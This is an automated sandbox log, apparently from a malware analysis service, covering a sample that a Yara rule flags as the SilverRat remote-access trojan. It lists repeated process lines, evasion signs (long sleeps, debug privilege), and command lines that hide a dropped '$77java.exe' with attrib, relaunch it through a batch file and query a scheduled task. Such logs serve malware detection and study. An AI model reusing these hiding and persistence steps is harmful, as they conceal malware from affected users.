                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected SilverRat
                  Source: Yara matchFile source: RLesaPFXew.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.RLesaPFXew.exe.1d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RLesaPFXew.exe.3af8618.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RLesaPFXew.exe.3af8618.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.2129565272.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RLesaPFXew.exe PID: 5576, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\java\$77java.exe, type: DROPPED
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeMemory allocated: A00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeMemory allocated: 1B620000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\java\$77java.exeMemory allocated: FA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\java\$77java.exeMemory allocated: 1B650000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\java\$77java.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\java\$77java.exeMemory allocated: 1B040000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\java\$77java.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7002Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2747Jump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe TID: 1864Thread sleep count: 71 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exe TID: 6536Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Users\user\java\$77java.exe TID: 5716Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\java\$77java.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\java\$77java.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\java\$77java.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: $77java.exe, 0000000D.00000002.3391902059.000000001C308000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%/
                  Source: RLesaPFXew.exe, 00000000.00000002.2158070859.000000000309F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java"Jump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java\$77java.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat""Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\java\$77java.exe "C:\Users\user\java\$77java.exe" Jump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exeJump to behavior
